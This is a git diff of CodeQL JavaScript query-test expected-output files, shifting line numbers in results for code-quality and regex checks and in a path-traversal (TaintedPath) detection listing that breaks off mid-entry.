tst.js:2:1:2:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:2:14:2:20 | 'array' | array | -| tst.js:19:9:19:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:23:6:23:11 | 'null' | null | -| tst.js:33:2:33:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:33:16:33:22 | 'array' | array | +| tst.js:1:1:1:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:1:14:1:20 | 'array' | array | +| tst.js:18:9:18:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:21:6:21:11 | 'null' | null | +| tst.js:30:2:30:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:30:16:30:22 | 'array' | array | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected index f3c95f56d3d2..01e87bf5c177 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected @@ -3,4 +3,4 @@ | letExpr.js:3:13:3:38 | let (x ... ) x + y | Use let declarations instead of let expressions. | | letStmt.js:3:1:5:1 | let (x ... + y);\\n} | Use let declarations instead of let statements. | | postfixComprehension.js:2:15:2:38 | [i*i fo ... mbers)] | Use prefix comprehensions instead of postfix comprehensions. | -| tst.js:2:15:2:31 | function(x) x * x | Use arrow expressions instead of expression closures. | +| tst.js:1:15:1:31 | function(x) x * x | Use arrow expressions instead of expression closures. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected index 2af10be24c0d..c9b2667e9e74 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected @@ -1,7 +1,7 @@ -| tst.js:2:17:2:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:3:15:3:21 | args[i] | read | -| tst.js:7:17:7:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:8:15:8:21 | args[i] | read | -| tst.js:18:5:18:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:19:15:19:21 | args[j] | read | -| tst.js:23:5:23:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:24:15:24:21 | args[j] | read | -| tst.js:34:19:34:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:35:9:35:12 | a[i] | read | -| tst.js:51:9:51:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:43:51:46 | a[i] | read | -| tst.js:51:26:51:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:52:51:55 | b[i] | read | +| tst.js:1:17:1:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:2:15:2:21 | args[i] | read | +| tst.js:5:17:5:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:6:15:6:21 | args[i] | read | +| tst.js:15:5:15:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:16:15:16:21 | args[j] | read | +| tst.js:19:5:19:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:20:15:20:21 | args[j] | read | +| tst.js:29:19:29:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:30:9:30:12 | a[i] | read | +| tst.js:46:9:46:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:43:46:46 | a[i] | read | +| tst.js:46:26:46:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:52:46:55 | b[i] | read | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected index 2f61724a5661..740b5e5dafe7 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected @@ -1,11 +1,11 @@ -| NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound | -| ts-test.ts:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:3:10:3:10 | x | previously bound | -| ts-test.ts:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:10:8:10 | x | previously bound | -| ts-test.ts:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:11:7:11:7 | x | previously bound | -| ts-test.ts:21:8:21:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:20:8:20:13 | string | previously bound | -| ts-test.ts:32:16:32:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:34:20:34:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:40:27:40:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:40:16:40:21 | string | previously bound | -| tst.js:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:3:10:3:10 | x | previously bound | -| tst.js:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:10:8:10 | x | previously bound | -| tst.js:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:11:7:11:7 | x | previously bound | +out| NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound | +| ts-test.ts:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:2:10:2:10 | x | previously bound | +| ts-test.ts:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:6:10:6:10 | x | previously bound | +| ts-test.ts:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:7:8:7 | x | previously bound | +| ts-test.ts:18:8:18:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:17:8:17:13 | string | previously bound | +| ts-test.ts:29:16:29:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:31:20:31:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:37:27:37:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:37:16:37:21 | string | previously bound | +| tst.js:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:2:10:2:10 | x | previously bound | +| tst.js:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:6:10:6:10 | x | previously bound | +| tst.js:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:7:8:7 | x | previously bound | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected index 9dcd49a99d3f..75d8c23b51f6 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected @@ -1,3 +1,3 @@ -| tst.js:2:1:2:3 | (0) | Assignment to property foo of a primitive value with type number. | -| tst.js:11:5:11:5 | s | Assignment to a property of a primitive value with type string. | -| tst.js:17:3:17:3 | x | Assignment to property y of a primitive value with type number or string. | +| tst.js:1:1:1:3 | (0) | Assignment to property foo of a primitive value with type number. | +| tst.js:8:5:8:5 | s | Assignment to a property of a primitive value with type string. | +| tst.js:13:3:13:3 | x | Assignment to property y of a primitive value with type number or string. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected index bf01936dd730..30532ee8c952 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected @@ -1,2 +1,2 @@ -| tst.js:15:3:15:12 | set x(v ... OK\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | -| tst.js:40:3:40:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:40:9:40:10 | _y | _y | +| tst.js:15:3:15:12 | set x(v) {\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | +| tst.js:38:3:38:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:38:9:38:10 | _y | _y | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected index a5e92e24b4bd..2b911b330b6c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected @@ -1 +1 @@ -| tst.js:15:3:15:16 | return "nope"; | Useless return statement in setter function. | +| tst.js:14:3:14:16 | return "nope"; | Useless return statement in setter function. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected index 92b3fc978773..b88dd7d68e80 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected @@ -8,17 +8,17 @@ | reflection.js:7:15:7:18 | 1 | Superfluous arguments passed to $@. | reflection.js:1:1:1:23 | functio ... eturn;} | function f0 | | reflection.js:12:18:12:18 | 2 | Superfluous argument passed to $@. | reflection.js:2:1:2:24 | functio ... eturn;} | function f1 | | thisparameter.ts:4:11:4:12 | 45 | Superfluous argument passed to $@. | thisparameter.ts:1:1:1:45 | functio ... eturn;} | function foo | -| tst.js:11:3:11:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | -| tst.js:33:15:33:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | -| tst.js:37:4:37:5 | 42 | Superfluous argument passed to $@. | tst.js:38:4:38:23 | function() {return;} | anonymous function | -| tst.js:46:19:46:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:70:11:70:12 | 42 | Superfluous argument passed to $@. | tst.js:49:2:51:2 | functio ... urn;\\n\\t} | function nonEmpty | -| tst.js:75:13:75:14 | 42 | Superfluous argument passed to $@. | tst.js:63:19:63:33 | () => undefined | function emptyArrow | -| tst.js:76:31:76:32 | 42 | Superfluous argument passed to $@. | tst.js:64:33:64:32 | () {} | default constructor of class ImplicitEmptyConstructor | -| tst.js:77:31:77:32 | 42 | Superfluous argument passed to $@. | tst.js:67:14:68:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | -| tst.js:78:20:78:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:114:20:114:21 | 42 | Superfluous argument passed to $@. | tst.js:82:2:86:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | -| tst.js:115:20:115:21 | 42 | Superfluous argument passed to $@. | tst.js:87:2:90:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | -| tst.js:116:20:116:21 | 42 | Superfluous argument passed to $@. | tst.js:91:2:94:2 | functio ... .");\\n\\t} | function notAPlainThrower3 | -| tst.js:120:23:120:24 | 87 | Superfluous argument passed to $@. | tst.js:102:2:104:2 | functio ... (p);\\n\\t} | function throwerWithParam | -| tst.js:121:18:121:19 | 42 | Superfluous argument passed to $@. | tst.js:105:2:113:2 | functio ... )();\\n\\t} | function throwerIndirect | +| tst.js:10:3:10:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | +| tst.js:31:15:31:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | +| tst.js:34:4:34:5 | 42 | Superfluous argument passed to $@. | tst.js:35:4:35:23 | function() {return;} | anonymous function | +| tst.js:43:19:43:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:67:11:67:12 | 42 | Superfluous argument passed to $@. | tst.js:46:2:48:2 | functio ... urn;\\n\\t} | function nonEmpty | +| tst.js:72:13:72:14 | 42 | Superfluous argument passed to $@. | tst.js:60:19:60:33 | () => undefined | function emptyArrow | +| tst.js:73:31:73:32 | 42 | Superfluous argument passed to $@. | tst.js:61:33:61:32 | () {} | default constructor of class ImplicitEmptyConstructor | +| tst.js:74:31:74:32 | 42 | Superfluous argument passed to $@. | tst.js:64:14:65:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | +| tst.js:75:20:75:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:111:20:111:21 | 42 | Superfluous argument passed to $@. | tst.js:79:2:83:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | +| tst.js:112:20:112:21 | 42 | Superfluous argument passed to $@. | tst.js:84:2:87:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | +| tst.js:113:20:113:21 | 42 | Superfluous argument passed to $@. | tst.js:88:2:91:2 | functio ... .");\\n\\t} | function notAPlainThrower3 | +| tst.js:117:23:117:24 | 87 | Superfluous argument passed to $@. | tst.js:99:2:101:2 | functio ... (p);\\n\\t} | function throwerWithParam | +| tst.js:118:18:118:19 | 42 | Superfluous argument passed to $@. | tst.js:102:2:110:2 | functio ... )();\\n\\t} | function throwerIndirect | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected index 967ac1ce58f3..7141c9d5589e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected @@ -1,7 +1,7 @@ -| tst.js:5:30:5:45 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:7:21:7:36 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:9:20:9:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:11:17:11:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | -| tst.js:18:10:18:25 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use arguments.caller. | +| tst.js:4:30:4:45 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:5:21:5:36 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:6:20:6:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:7:17:7:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | +| tst.js:13:10:13:25 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use arguments.caller. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected index 4439f2c694b6..6efbbf8544bc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected @@ -1 +1 @@ -| tst.js:5:9:5:21 | yield index++ | This yield expression is contained in $@ which is not marked as a generator. | tst.js:1:1:1:8 | function | function idMaker | +| tst.js:4:9:4:21 | yield index++ | This yield expression is contained in $@ which is not marked as a generator. | tst.js:1:1:1:8 | function | function idMaker | diff --git a/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected b/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected index 5718da0e961c..22e149651e78 100644 --- a/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected +++ b/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected @@ -1,5 +1,5 @@ -| tst.js:14:10:14:15 | q[i++] | This loop may prevent optimization because its iteration variable is a property. | -| tst.js:19:10:19:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | -| tst.js:24:10:24:14 | var p | This loop may prevent optimization because its iteration variable is captured. | -| tst.js:34:14:34:14 | p | This loop may prevent optimization because its iteration variable is captured. | -| tst.js:40:10:40:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | +| tst.js:13:10:13:15 | q[i++] | This loop may prevent optimization because its iteration variable is a property. | +| tst.js:17:10:17:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | +| tst.js:21:10:21:14 | var p | This loop may prevent optimization because its iteration variable is captured. | +| tst.js:30:14:30:14 | p | This loop may prevent optimization because its iteration variable is captured. | +| tst.js:35:10:35:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | diff --git a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected index 4886857477f0..a4dd7cac42e7 100644 --- a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected +++ b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected @@ -1 +1 @@ -| tst.js:2:18:2:22 | start | This parameter $@, which may prevent optimization because the surrounding function uses the arguments object. | tst.js:4:9:4:13 | start | is reassigned | +| tst.js:1:18:1:22 | start | This parameter $@, which may prevent optimization because the surrounding function uses the arguments object. | tst.js:3:9:3:13 | start | is reassigned | diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected index 2210f9711682..52d3597bb637 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected @@ -1 +1 @@ -| tst.js:4:17:4:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:4:11:4:14 | (a+) | this capture group | tst.js:4:8:4:16 | (?!(a+)b) | negative lookahead assertion | +| tst.js:3:17:3:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:3:11:3:14 | (a+) | this capture group | tst.js:3:8:3:16 | (?!(a+)b) | negative lookahead assertion | diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected index d2acad5b7659..69c471955218 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected @@ -1,4 +1,4 @@ -| tst.js:4:2:4:3 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:8:13:8:14 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:15:16:15:17 | \\2 | There is no capture group 2 in this regular expression. | -| tst.js:16:16:16:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | +| tst.js:3:2:3:3 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:6:13:6:14 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:12:16:12:17 | \\2 | There is no capture group 2 in this regular expression. | +| tst.js:13:16:13:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected index 2b0eaa5e3a03..d9382b86a625 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected @@ -1,3 +1,3 @@ -| tst.js:2:4:2:4 | ^ | This assertion can never match. | -| tst.js:11:5:11:5 | ^ | This assertion can never match. | -| tst.js:20:5:20:5 | ^ | This assertion can never match. | +| tst.js:1:4:1:4 | ^ | This assertion can never match. | +| tst.js:9:5:9:5 | ^ | This assertion can never match. | +| tst.js:16:5:16:5 | ^ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected index 6e57f22c18a7..a380a81c2744 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected @@ -1,4 +1,4 @@ -| tst.js:2:10:2:10 | $ | This assertion can never match. | -| tst.js:11:3:11:3 | $ | This assertion can never match. | -| tst.js:20:3:20:3 | $ | This assertion can never match. | -| tst.js:38:6:38:6 | $ | This assertion can never match. | +| tst.js:1:10:1:10 | $ | This assertion can never match. | +| tst.js:9:3:9:3 | $ | This assertion can never match. | +| tst.js:16:3:16:3 | $ | This assertion can never match. | +| tst.js:33:6:33:6 | $ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 8f1786508a59..bfb374411b6a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected @@ -4,159 +4,159 @@ nodes | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | semmle.label | parse(r ... ).query | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | semmle.label | parse(r ... ry.path | | TaintedPath-es6.js:7:20:7:26 | req.url | semmle.label | req.url | -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | semmle.label | join("public", path) | -| TaintedPath-es6.js:10:41:10:44 | path | semmle.label | path | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | semmle.label | join("public", path) | +| TaintedPath-es6.js:9:41:9:44 | path | semmle.label | path | | TaintedPath.js:9:7:9:48 | path | semmle.label | path | | TaintedPath.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | | TaintedPath.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | | TaintedPath.js:9:24:9:30 | req.url | semmle.label | req.url | -| TaintedPath.js:12:29:12:32 | path | semmle.label | path | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | -| TaintedPath.js:15:45:15:48 | path | semmle.label | path | -| TaintedPath.js:18:33:18:36 | path | semmle.label | path | -| TaintedPath.js:21:33:21:36 | path | semmle.label | path | -| TaintedPath.js:24:33:24:36 | path | semmle.label | path | -| TaintedPath.js:33:31:33:34 | path | semmle.label | path | -| TaintedPath.js:38:3:38:44 | path | semmle.label | path | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:38:20:38:26 | req.url | semmle.label | req.url | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:42:48:42:51 | path | semmle.label | path | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | -| TaintedPath.js:46:45:46:48 | path | semmle.label | path | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:48:51:48:54 | path | semmle.label | path | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:50:50:50:53 | path | semmle.label | path | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| TaintedPath.js:52:52:52:55 | path | semmle.label | path | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | -| TaintedPath.js:54:49:54:52 | path | semmle.label | path | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:56:48:56:51 | path | semmle.label | path | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:58:54:58:57 | path | semmle.label | path | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | -| TaintedPath.js:60:57:60:60 | path | semmle.label | path | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:65:31:65:76 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:65:63:65:69 | req.url | semmle.label | req.url | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:66:31:66:74 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:66:61:66:67 | req.url | semmle.label | req.url | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:67:31:67:73 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:67:60:67:66 | req.url | semmle.label | req.url | -| TaintedPath.js:75:48:75:60 | req.params[0] | semmle.label | req.params[0] | -| TaintedPath.js:84:6:84:47 | path | semmle.label | path | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:84:23:84:29 | req.url | semmle.label | req.url | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | -| TaintedPath.js:86:44:86:47 | path | semmle.label | path | -| TaintedPath.js:87:14:87:17 | path | semmle.label | path | -| TaintedPath.js:88:32:88:39 | realpath | semmle.label | realpath | -| TaintedPath.js:89:45:89:52 | realpath | semmle.label | realpath | -| TaintedPath.js:120:6:120:47 | path | semmle.label | path | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:120:23:120:29 | req.url | semmle.label | req.url | -| TaintedPath.js:122:23:122:26 | path | semmle.label | path | -| TaintedPath.js:126:7:126:48 | path | semmle.label | path | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:126:24:126:30 | req.url | semmle.label | req.url | -| TaintedPath.js:128:19:128:22 | path | semmle.label | path | -| TaintedPath.js:130:7:130:29 | split | semmle.label | split | -| TaintedPath.js:130:15:130:18 | path | semmle.label | path | -| TaintedPath.js:130:15:130:29 | path.split("/") | semmle.label | path.split("/") | -| TaintedPath.js:132:19:132:23 | split | semmle.label | split | -| TaintedPath.js:132:19:132:33 | split.join("/") | semmle.label | split.join("/") | -| TaintedPath.js:136:19:136:23 | split | semmle.label | split | -| TaintedPath.js:136:19:136:26 | split[x] | semmle.label | split[x] | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | semmle.label | prefix + split[x] | -| TaintedPath.js:137:28:137:32 | split | semmle.label | split | -| TaintedPath.js:137:28:137:35 | split[x] | semmle.label | split[x] | -| TaintedPath.js:139:7:139:38 | concatted | semmle.label | concatted | -| 